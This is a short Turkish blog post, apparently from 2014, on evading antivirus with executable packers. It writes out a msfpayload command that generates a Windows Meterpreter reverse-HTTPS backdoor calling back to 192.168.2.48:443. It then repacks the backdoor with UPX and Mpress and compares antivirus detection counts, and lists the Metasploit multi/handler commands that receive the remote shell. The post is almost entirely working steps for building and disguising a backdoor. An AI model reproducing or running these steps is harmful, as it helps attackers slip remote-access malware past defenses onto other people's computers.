1 Mart 2014 Cumartesi

AV Bypass: Paketleyiciler (2)

AV Bypass: Paketleyiciler (2)
Bu yazıda dosya sıkıştırma uygulamaları kullanılarak bir ters HTTPS bağlantısı kurularak bağlantı sağlanacaktır.

Metasploit kullanılarak oluşturulan bir payload  aşağıdaki gibi gerçekleştirilebilir:
# msfpayload windows/meterpreter/reverse_https LHOST=192.168.2.48 LPORT=443 > Uygulama1.exe

Metasploit modülleri olan msfpayload ve msfencode ile zararlı uygulama oluşturma işlemleri için bakınız.

Bu uygulama 36 AV tarafından tespit edilmiştir.


Kali üzerindeki UPX adlı sıkılaştırma aracı ile aynı uygulamanın sıkılaştırılmış hali oluşturulabilir:
upx -9qf -oUygulama2.exe Uygulama1.exe

Sıkıştırılmış dosyanın 37 AV tarafından tespit edilmiştir.


Mpress ile sıkıştırma işlemi aşağıdaki gibidir:

Sıkıştırılmış dosyanın 30 AV tarafından tespit edilmiştir.


Not: Çok fazla yaygınlaşmamış paketleyicilerin kullanılması AV'ler tarafından tespit edilme oranını azlacaktır.

Oluşturulan uygulamanın işlevselliğinde bir değişiklik olmamaktadır. Aşağıdaki komutlar sonrasında uygulama çalıştırılınca ters HTTPS bağlantısı kurulmaktatır.
# msfconsole
# msf exploit(handler) > use exploit/multi/handler
# msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
# msf exploit(handler) > set ExitOnSession false
# msf exploit(handler) > set LHOST 192.168.2.48
# msf exploit(handler) > set LPORT 443
# msf exploit(handler) > exploit -j


Hiç yorum yok:

Yorum Gönder